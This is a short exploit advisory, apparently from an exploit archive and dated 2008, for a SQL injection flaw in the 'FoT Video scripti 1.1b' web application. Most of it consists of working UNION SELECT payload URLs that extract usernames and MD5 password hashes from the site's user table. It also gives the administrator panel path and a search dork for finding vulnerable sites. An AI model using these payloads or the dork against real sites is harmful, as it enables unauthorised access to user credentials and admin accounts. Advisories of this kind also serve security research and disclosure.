[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : FoT Video scripti 1.1b (oyun) Remote SQL Injection Vulnerability
# Published : 2008-09-13
# Author : Crackers_Child
# Previous Title : phpSmartCom 0.2 (LFI/SQL) Multiple Remote Vulnerabilities
# Next Title : Linkarity (link.php) Remote SQL Injection Vulnerability
**************************************************************************************
Author : By Crackers_Child
Contact: cashr00t@hotmail.com
Greetz : biyosecurity.com & milw0rm.com & tryag.cc & All My Friends
**************************************************************************************
Script : FoT Video scripti V1.1 Beta
**************************************************************************************
Exploit : For username
you can read username on title
www.site.com/script_path/izle.asp?oyun=56+union+select+0,1,KULLANICIADI,3,4,5,6,7,8,9,10,11,12,13+from+KULLANICI
**************************************************************************************
Exploit : For Password(md5 hash)
you can read password on title
www.site.com/script_path/izle.asp?oyun=56+union+select+0,1,PAROLA,3,4,5,6,7,8,9,10,11,12,13+from+KULLANICI
**************************************************************************************
Administrator Path
www.site.com/script_path/yonetim_default.asp
**************************************************************************************
Dork : inurl:"izle.asp?oyun=
**************************************************************************************
N0te : Hepinizn Aq :lol
**************************************************************************************
# www.Syue.com [2008-09-13]